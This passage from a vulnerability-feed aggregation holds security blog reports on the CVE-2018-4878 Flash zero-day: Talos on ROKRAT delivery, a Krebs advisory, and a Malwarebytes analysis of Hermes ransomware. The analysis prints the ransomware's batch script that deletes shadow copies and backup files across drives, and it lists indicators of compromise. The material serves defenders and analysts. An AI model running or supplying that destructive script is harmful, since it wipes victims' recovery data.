that an attacker exploited this vulnerability with a Flash object embedded in a Microsoft Excel document. By opening the document, the exploit was executed in order to download an additional payload from a compromised website. \n \nWe identified that the downloaded payload is the well-known Remote Administration Tool named ROKRAT. We already extensively spoke about this RAT on several articles in this blog: [here](<http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html>), [here](<http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html>), [here ](<http://blog.talosintelligence.com/2017/04/introducing-rokrat.html>)and [here](<http://blog.talosintelligence.com/2017/02/korean-maldoc.html>). It is particularity used with cloud platforms in order to exfiltrate documents and manage infected systems. \n \n \n \n\n\n## Flash 0-Day: CVE-2018-4878\n\n \nThe campaign started by a malicious Microsoft Excel sheet: \n \n\n\n[](<https://2.bp.blogspot.com/-pjfaPJVOWWo/WnSL-1mbFgI/AAAAAAAAAZE/8EqH8NJAkDQK9vAtp-cOWfeUz8B-FTePQCEwYBhgL/s1600/image2.png>)\n\n \n \nThis malicious document contains an ActiveX object. This object is a SWF file (Flash). The CVE-2018-4878 use after free vulnerability is used in order to download an additional payload from a compromised web server. This payload is a shellcode loaded in memory and executed. We identified Flash exploits from November 2017. Here is the exploit workflow: \n\n\n[](<https://1.bp.blogspot.com/-_Hn6CiFTr-k/WnngY0JZCjI/AAAAAAAAAUM/ockPYyCLpzcc0yKSaHrvwgwxbZ8j1NfEACLcBGAs/s1600/012918%2B0%2Bday%2Bflowchart.jpg>)\n\n \n \n\n\n## CC & ROKRAT Payload\n\n \nAs explained previously, the purpose of the exploit is to download and execute an additional payload on the Internet. Here are some URLs where this additional payload was downloaded: \n \n\n\n * hxxp://www[.]1588-2040[.]co[.]kr/conf/product_old.jpg\n * hxxp://www[.]1588-2040[.]co[.]kr/design/m/images/image/image.php\n * hxxp://www[.]korea-tax[.]info/main/local.php\n * hxxp://www[.]dylboiler[.]co[.]kr/admincenter/files/board/4/manager.php\n \n \nAll these URLs are compromised websites located in South Korea. We identified that several of these URLs hosted a shellcode used to unpack and execute a ROKRAT variant. Here is the PDB of this sample: \n \n\n\n * d:\\HighSchool\\version 13\\2ndBD\\T+M\\T+M\\Result\\DocPrint.pdb\n\n \n \nIt's the same PDB that was previously identified during our investigations. The exploit was used to drop ROKRAT on compromised systems. One of the ROKRAT samples identified used a naming reference to Hancom Secure AnySign. It is a reference to a legitimate application developed by Hancom Secure for PKI & authentication mechanisms. It is a software application used to protect user data and is massively used in South Korea. \n \n\n\n## Conclusion\n\n \nGroup 123 have now joined some of the criminal elite with this latest payload of ROKRAT. They have used an Adobe Flash 0-day which was outside of their previous capabilities - they did use exploits in previous campaigns but never a net new exploit as they have done now. This change represents a major shift in Group 123s maturity level, we can now confidentially assess Group 123 has a highly skilled, highly motivated and highly sophisticated group. Whilst Talos do not have any victim information related to this campaign we suspect the victim has been a very specific and high value target. Utilizing a brand new exploit, previously not seen in the wild, displays they were very determined to ensure their attack worked. \n \nIn January 2018 we produced a write up '[Korea In The Crosshair](<http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html>)' detailing the campaigns previously carried out by Group 123. In this write up we explained this would not be the last time we witness attacks from this threat actor and that we would expect them to continue to evolve. Within a few weeks we have witnessed the evolution of Group 123 and we will continue to monitor the threat landscape for this group. \n \n\n\n## Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n \n\n\n[](<https://1.bp.blogspot.com/-TLuO62f5zjU/WnSMEFm8rCI/AAAAAAAAAZI/gt11FX0YqBwyNntl9e1Mna-hwknzeUicQCEwYBhgL/s1600/image1.png>)\n\n \n \nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \n[CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>) or[ WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>),[ ](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)[NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and[ ](<https://meraki.cisco.com/products/appliances>)[Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## IOCs\n\n \nFlash exploits: \n \nfec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 \n3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c \n \nROKRAT sample: \n \nE1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd \n \nURL: \n \nhxxp://www[.]1588-2040[.]co[.]kr/conf/product_old.jpg \nhxxp://www[.]1588-2040[.]co[.]kr/design/m/images/image/image.php \nhxxp://www[.]korea-tax[.]info/main/local.php \nhxxp://www[.]dylboiler[.]co[.]kr/admincenter/files/board/4/manager.php \n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=hjJZCYsfFL4:2nMPZ9CIAYE:yIl2AUoC8zA>)\n\n", "modified": "2018-02-06T17:06:25", "published": "2018-02-02T08:27:00", "id": "TALOSBLOG:B69F0136CDE2A78382370469FF70F7DB", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/hjJZCYsfFL4/group-123-goes-wild.html", "type": "talosblog", "title": "Flash 0-Day In The Wild: Group 123 At The Controls", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "krebs": [{"lastseen": "2018-02-02T15:59:51", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4878"], "description": "**Adobe** warned on Thursday that attackers are exploiting a previously unknown security hole in its **Flash Player** software to break into **Microsoft Windows** computers. Adobe said it plans to issue a fix for the flaw in the next few days, but now might be a good time to check your exposure to this still-ubiquitous program and harden your defenses.\n\nAdobe said a critical vulnerability (**CVE-2018-4878**) exists in Adobe Flash Player _28.0.0.137_ and earlier versions. Successful exploitation could allow an attacker to take control of the affected system.\n\nThe software company warns that an exploit for the flaw is being used in the wild, and that so far the attacks leverage **Microsoft Office** documents with embedded malicious Flash content. Adobe said it plans to address this vulnerability in a release planned for the week of February 5.\n\nAccording to [Adobe's advisory](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>), beginning with Flash Player 27, administrators have the ability to change Flash Player's behavior when running on Internet Explorer on Windows 7 and below by prompting the user before playing Flash content. A guide on how to do that is [here](<https://www.adobe.com/content/dam/acom/en/devnet/flashplayer/articles/flash_player_admin_guide/pdf/flash_player_27_0_admin_guide.pdf>) (PDF). Administrators may also consider implementing [Protected View for Office](<https://support.office.com/en-us/article/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653#bm5>). Protected View opens a file marked as potentially unsafe in Read-only mode.\n\nHopefully, most readers here have taken my longstanding advice to disable or at least hobble Flash, a buggy and insecure component that nonetheless ships by default with **Google Chrome** and **Internet Explorer**. More on that approach (as well as slightly less radical solutions) can be found in [A Month Without Adobe Flash Player](<http://krebsonsecurity.com/2015/06/a-month-without-adobe-flash-player/>). The short version is that you can probably get by without Flash installed and not miss it at all.\n\nFor readers still unwilling to cut the Flash cord, there are half-measures that work almost as well. Fortunately, [disabling Flash in Chrome](<https://support.google.com/chrome/answer/108086?hl=en>) is simple enough. Paste \u201c<chrome://settings/content>\u201d into a Chrome browser bar and then select \u201cFlash\u201d from the list of items. By default it should be set to \u201cAsk first\u201d before running Flash, although users also can disable Flash entirely here or whitelist and blacklist specific sites.\n\nBy default, **Mozilla Firefox** on Windows computers with Flash installed runs Flash in a \"[protected mode](<http://blogs.adobe.com/security/2012/06/inside-flash-player-protected-mode-for-firefox.html>),\" which prompts the user to decide if they want to enable the plugin before Flash content runs on a Web site.\n\nAnother, perhaps less elegant, alternative to wholesale kicking Flash to the curb is to keeping it installed in a browser that you don\u2019t normally use, and then only using that browser on sites that require Flash.", "modified": "2018-02-02T14:21:06", "published": "2018-02-02T14:21:06", "id": "KREBS:E2D2D085D282D0D49FB14A33098B68DE", "href": "https://krebsonsecurity.com/2018/02/attackers-exploiting-unpatched-flaw-in-flash/", "type": "krebs", "title": "Attackers Exploiting Unpatched Flaw in Flash", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-03-15T05:37:59", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4878"], "description": "_This blog post was authored by @hasherezade, J\u00e9r\u00f4me Segura and Vasilios Hioureas._\n\nAt the end of January, the South Korean Emergency Response Team (KrCERT) [published](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) news of a Flash Player zero-day used in targeted attacks. The flaw, which exists in Flash Player 28.0.0.137 and below, was distributed [via malicious Office documents](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) containing the embedded Flash exploit. Only a couple of weeks after the public announcement, [spam campaigns](<https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massive-malspam-campaign>) were already beginning to pump out malicious Word documents containing the newly available exploit.\n\nWhile spam has been an active distribution channel for some time now, the news of a Flash exploit would most certainly interest exploit kit authors as well. Indeed, in our previous blog post about this vulnerability (CVE-2018-4878), we showed how trivial it was to use an already available [Proof-of-Concept](<https://blog.morphisec.com/cve-2018-4878-an-analysis-of-the-flash-player-hack>) and [package it as as a drive-by download](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Flash_0_day.gif> \"\" ) instead.\n\nOn March 9th, [MDNC discovered](<https://malware.dontneedcoffee.com/2018/03/CVE-2018-4878.html>) that a less common, but more sophisticated exploit kit called [GreenFlash Sundown](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/>) had started to use this recent Flash zero-day to distribute the Hermes ransomware. This payload was formerly used as part of an attack on a Taiwanese bank and suspected to be the work of a [North Korean hacking group](<http://baesystemsai.blogspot.ca/2017/10/taiwan-heist-lazarus-tools.html>). According to some reports, it may be a decoy attack and \"[pseudo-ransomware](<https://securingtomorrow.mcafee.com/mcafee-labs/taiwan-bank-heist-role-pseudo-ransomware/>)\".\n\nBy checking on the indicators published by MDNC, we were able to identify this campaign within our telemetry and noticed that all exploit attempts were made against South Korean users. Based on our records, the first hit happened on February 27, 2018, (01:54 UTC) via a compromised Korean website.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/Call_to_EK.png> \"\" )\n\nWe replayed this attack in our lab and spent a fair amount of time looking for redirection code within the JavaScript libraries part of the self hosted OpenX server. Instead, we found that it was hiding in the main page's source code.\n\nWe had already pinpointed where the redirection was happening by checking the DOM on the live page, but we also confirmed it by decoding the large malicious blurb that went through Base64 and RC4 encoding (we would like to thank [David Ledbetter](<https://twitter.com/ledtech3>) for that).\n\n### Hermes ransomware\n\nThe payload from this attack is Hermes ransomware, version 2.1.\n\n#### **Behavioral analysis**\n\nThe ransomware copies itself into `%TEMP%` under the name `svchosta.exe` and redeploys itself from that location. The initial sample is then deleted.\n\n\n\nThe ransomware is not particularly stealthy\u2014some windows pop up during its run. For example, we are asked to run a batch script with administrator privileges:\n\n\n\nThe authors didn't bother to deploy any UAC bypass technique, relying only on social engineering for this. The pop-up is deployed in a loop, and by this way it tries to force the user into accepting it. But even if we don't let the batch script be deployed, the main executable proceeds with encryption.\n\nThe batch script is responsible for removing the shadow copies and other possible backups:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/bat_content-1.png> \"\" )\n\nIt is dropped inside C:\\Users\\Public along with some other files:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/in_public-1.png> \"\" )\n\nThe file \"PUBLIC\" contains a blob with RSA public key. It is worth noting that this key is unique on each run, so, the RSA key pair is generated per victim. Example:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/public_dropped-1.png> \"\" )\n\nAnother file is an encrypted block of data named UNIQUE_ID_DO_NOT_REMOVE. It is a blob containing an encrypted private RSA key, unique for the victim:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/unique_id-1-1.png> \"\" )\n\nAnalyzing the blob header, we find the following information:\n\n * 0x07 - [PRIVATEKEYBLOB](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa387453\\(v=vs.85\\).aspx>)\n * 0x02 - [CUR_BLOB_VERSION](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa387453\\(v=vs.85\\).aspx>): 2\n * 0xA400 - ALG_ID: [CALG_RSA_KEYX](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa375549\\(v=vs.85\\).aspx>)\n\nThe rest of the data is encrypted\u2014at this moment, we can guess that it is encrypted by the RSA public key of the attackers.\n\nThe same folder also contains a ransom note. When the encryption finished, the ransom note pops up. The note is in HTML format, named DECRYPT_INFORMATION.html.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/ransom.png> \"\" )\n\nThe interesting fact is that, depending on the campaign, in some of the samples the authors used [BitMessage](<https://wikipedia.org/wiki/Bitmessage>) to communicate with victims:\n\n\n\nThis method was used in the past by a few other authors, for example in [Chimera ransomware](<https://blog.malwarebytes.com/threat-analysis/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild/>), and by the author of original Petya in his affiliate programs.\n\nEncrypted files don't have their names changed. Each file is encrypted with a new key\u2014the same plaintext produces various ciphertext. The entropy of the encrypted file is high, and no patterns are visible. That suggests that some stream cipher or a cipher with chained blocks was used. (The most commonly used in such cases is AES in CBC mode, but we can be sure only after analyzing the code). Below, you can see a visualization of a BMP file before and after being encrypted by Hermes: \n\nInside each file, after the encrypted content, there is a \"HERMES\" marker, followed by another blob:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/hermes_marker-1.png> \"\" )\n\nThis time the blob contains an exported session key (0x01 : [SIMPLEBLOB](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa387453\\(v=vs.85\\).aspx>)) and the algorithm identifier is AES (0x6611: [CALG_AES](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa375549\\(v=vs.85\\).aspx>)). We can make an educated guess that it is the AES key for the file, encrypted by the victim's RSA key (from the generated pair).\n\nThe ransomware achieves persistence by dropping a batch script in the Startup folder:\n\n\n\nThe script is simple; its role is just to deploy the dropped ransomware: svchosta.exe.\n\n\n\nSo, on each system startup it will make a check for new, unencrypted files and try to encrypt them. That's why, as soon as one discovers that they have been attacked by this ransomware, they should remove the persistence entry in order to not let the attack repeat itself.\n\n### Inside the ransomware\n\n#### **Execution flow**\n\nAt the beginning of the execution, the ransomware creates a mutex named \"tech\":\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/create_mutex-1.png> \"\" )\n\nThe sample is mildly obfuscated, for example, its imports are loaded at runtime. The .data section of the PE file is also decrypted during the execution, so, at first we will not see the typical strings.\n\nFirst, the executable begins to dynamically load all its imports via a function at 4023e0:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/dynamicload-1.png> \"\" )\n\nIt then checks the registry key for a language code. If Russian, Belarusian, or Ukrainian are found as the system language, it exits the process (0x419 being Russian, 422 Ukrainian, and 423 Belarusian).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/checkrussian-1.png> \"\" )\n\nIt then creates two subprocesses - cmd.exe. One that copies itself into directory appdata/local/temp/svchost.exe, and another that executes the copied file.\n\nIt also generates crypto keys using standard CryoptAquireCOntext libraries, and saves the public key and some kind of ID into the following files:\n\n**C:\\Users\\Public\\UNIQUE_ID_DO_NOT_REMOVE**\n\n**C:\\Users\\Public\\PUBLIC**\n\nAs mentioned earlier, it writes out a script to auto run on startup with contents: **start \"\" %TEMP%\\svchosta.exe **into the Start menu startup folder. This is quite simple and conspicuous. Since it is always running and keeps persistence, it makes sense that it saved out the public key into a file so that it can later find that key and continue encrypting using a consistent key throughout all executions.\n\nBelow is the function that calls all of this functionality sequentially, labeled:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/MainFucntionCalls-1.png> \"\" )\n\nIt proceeds to cycle all available drives. If it is CDRom, it will skip it. Inside the function, it goes through all files and folders on the drive, but skips a few key directories, not limited to Windows, Mozilla, and the recycling bin.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/drivetyupe-1.png> \"\" )\n\nInside of the function labeled recursiveSearch_Encrypt are the checks for key folders and drive type:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/keydiresCheck-1.png> \"\" )\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/keydirchec2-1.png> \"\" )\n\nIt then continues on to enumerate netResources and encrypts those files as well. After encryption, it creates another bat file called **window.bat **to delete shadow volume and backup files. Here is its content:\n \n \n vssadmin Delete Shadows /all /quiet\n vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\n vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\n vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\n vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\n vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\n vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\n vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\n vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\n vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\n vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\n vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\n vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\n vssadmin Delete Shadows /all /quiet\n del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk\n del /s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.win d:\\*.dsk\n del /s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.win e:\\*.dsk\n del /s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.win f:\\*.dsk\n del /s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.win g:\\*.dsk\n del /s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.win h:\\*.dsk\n del %0\n \n\nIt then creates and executes another bat file called **svchostaaexe.bat **that cycles through the entire file system again to search for and delete all backup files. This is interesting, as we have rarely seen ransomware looking in so much detail for backup files.\n\nThere is no functionality that communicates a decryption key to a C2 server. This means that the file UNIQUE_ID_DO_NOT_REMOVE, which** **contains the unique ID you have to send to the email address, must be encrypted by a public key pair that the attackers have pre-generated and retained on their side.\n\nWe have found that there is a heavy code reuse from the old versions of Hermes with this one. The flow of the code looks to be a bit different, but the overall functionality is the same. This is quite clear when comparing the two versions in a disassembler.\n\nBelow are two screenshots: the first from the current version we are analyzing, and the second from the old version. You can clearly see that even though the flow and arrangement are a bit different, the functionality remains mostly the same.\n\nThe new version:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/new-1.png> \"\" )\n\nAnd the old version **237eee069c1df7b69cee2cc63dee24e6**:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/old-1.png> \"\" )\n\n### Attacked targets\n\nThe ransomware attacks the following extensions: \n` \ntif php 1cd 7z cd 1cd dbf ai arw txt doc docm docx zip rar xlsx xls xlsb xlsm jpg jpe jpeg bmp db eql sql adp mdf frm mdb odb odm odp ods dbc frx db2 dbs pds pdt pdf dt cf cfu mxl epf kdbx erf vrp grs geo st pff mft efd 3dm 3ds rib ma max lwo lws m3d mb obj x x3d c4d fbx dgn dwg 4db 4dl 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr bak cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx ddl df1 dmo dnc dp1 dqy dsk dsn dta dtsx dxl eco ecx edb emd fcd fic fid fil fm5 fol fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m myd ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 ppt pptx abw act aim ans apt asc ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crwl cyi dca dgs diz dne docz dot dotm dotx dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fbl fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hwp hz idx iil ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mell min mnt msg mwp nfo njx now nzb ocr odo odt ofl oft ort ott p7s pfs pfx pjt prt psw pu pvj pvm pwi pwr qdl rad rft ris rng rpt rst rt rtd rtf rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa stw sty sub sxg sxw tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof uot upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wpl wps wpt wpw wri wsc wsd wsh wtx xdl xlf xps xwp xy3 xyp xyw ybk yml zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 cal cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv djvu dm3 dmi vue dpx wire drz dt2 dtw dvl ecw eip exr fal fax fpos fpx g3 gcdp gfb gfie ggr gif gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jwl jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs myl ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cgm cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpgl hpl idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat otg ovp ovr pcs pfv pl plt vrml pobj psid rdl scv sk1 sk2 ssk stn svf svgz sxd tlc tne ufr vbr vec vml vsd vsdm vsdx vstm stm vstx wpg vsm xar yal orf ota oti ozb ozj ozt pal pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rwl s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw ste sumo sva save ssfn t2b tb0 tbn tfc tg4 thm tjp tm2 tn tpi ufo uga vda vff vpe vst wb1 wbc wbd wbm wbmp wbz wdp webp wpb wpe wvl x3f y ysp zif cdr4 cdr6 cdrw ddoc css pptm raw cpt pcx pdn png psd tga tiff tif xpm ps sai wmf ani flc fb3 fli mng smil svg mobi swf html csv xhtm dat \n`\n\n### Encryption\n\nHermes, like many other ransomware, uses AES along with RSA for the encryption. AES is used to encrypt files with a random key. RSA is used to protect the random AES key.\n\nThe ransomware uses two RSA key pairs, one being a RSA hardcoded public key for the attackers.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/hardcoded_key-1-1.png> \"\" )\n\nThen, there is a keypair for the victim. It is generated at the beginning of the attack. The private key from this key pair is encrypted by the attackers' public key and stored in the file UNIQUE_ID_DO_NOT_REMOVE.\n\nWhen the victim sends this file, the attackers can recover the victim's private key with the help of their own private key. The victim's public key is stored in PUBLIC in clear text. It is later used to encrypt random AES keys, generated per file.\n\nCryptography is implemented with the help of Windows Crypto API. Function calls are mildly obfuscated, and pointers to the functions are manually loaded.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/ms_provider-1.png> \"\" )\n\nEach file processing starts from checking if it was already encrypted. The ransomware uses the saved marker \"HERMES\" that we already saw during the behavioral analysis. The marker is stored at the end of the file, before the block where the AES key is saved. Its offset is 274 bytes from the end. So, first the file pointer is set at this position to make a check of the characters.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/marker_check-1.png> \"\" )\n\nIf the marker was found, the file is skipped. Otherwise, it is processed further. As we noticed during the behavioral analysis, each file is encrypted with a new key. Looking at the code, we can find the responsible function. Unfortunately for the victims, the authors used the secure function [CryptGenKey](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa379941\\(v=vs.85\\).aspx>):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/generate_key-1.png> \"\" )\n\nThe used identifier for the algorithm is 0x6610 ([CALG_AES_256](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa375549\\(v=vs.85\\).aspx>)). That means 256-bit is using AES encryption. This key is used to encrypt the content of the file. The file is read and encrypted in chunks, with 1,000,000 bytes each.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/file_encrypt-1.png> \"\" )\n\nAt the end, the marker \"HERMES\" is written and the exported AES key is saved:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/export_key_and_write-1.png> \"\" )\n\nThe handle to the attacker's RSA public key is passed, so the function [CryptExportKey](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa379931\\(v=vs.85\\).aspx>) automatically takes care of protecting the AES key. Only the owner of the RSA private key will be able to import it back.\n\n### Protection\n\nMalwarebytes users are protected against this Flash Player exploit. In addition, the ransomware payload was blocked at zero-hour strictly based on its malicious behaviour.\n\n\n\n### Conclusion\n\nAnother campaign that we know of targeting South Koreans specifically is carried by malvertising and uses the Magnitude exploit kit, which also delivers ransomware\u2014namely [Magniber](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>). That particular infection chain goes to great lengths to only infect this particular demographic, via geo-aware traffic redirection and language checks within the malware code itself.\n\nAfter analyzing Hermes, we found it to be a fully functional ransomware. However, we cannot be sure what the real motivations of the distributors were. Looking at the full context, we may suspect that it was politically motivated rather than a profit-driven attack.\n\nAlthough the infection vector appeared to narrow down to South Korea, the malware itself, unlike Magniber, does not specifically target these users. The fact that the ransomware excludes certain countries like Russia or Ukraine could tie the development and outsourcing of the malware to these areas or be a false flag. As we know, attribution is always a complex topic.\n\n### Indicators of compromise\n\nDomains involved in campaign:\n\n * 2018-02-27 (01:54 UTC)\n * staradvertsment[.]com\n * hunting.bannerexposure[.]info\n * 2018-02-28\n * staradvertsment[.]com\n * accompanied.bannerexposure[.]info\n * 2018-03-01 \n * switzerland.innovativebanner[.]info\n * 2018-03-07 \n * name.secondadvertisements[.]com\n * 2018-03-08 \n * assessed.secondadvertisements[.]com\n * marketing.roadadvertisements[.]com\n * 2018-03-09 \n * bannerssale[.]com\n * aquaadvertisement[.]com\n * technologies.roadadvertisements[.]com\n\nIP addresses:\n\n * 159.65.131[.]94\n * 159.65.131[.]94\n * 207.148.104[.]5\n\nHermes 2.1 ransomware:\n\n * A5A0964B1308FDB0AEB8BD5B2A0F306C99997C7C076D66EB3EBCDD68405B1DA2\n * pretty040782@gmail[.]com\n * pretty040782@keemail[.]me\n\nThe post [Hermes ransomware distributed to South Koreans via recent Flash zero-day](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-03-14T17:59:32", "published": "2018-03-14T17:59:32", "id": "MALWAREBYTES:E0E596B13A84774F12BFB5962B091DCE", "href": "https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/", "type": "malwarebytes", "title": "Hermes ransomware distributed to South Koreans via recent Flash zero-day", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-10T00:09:18", "bulletinFamily": 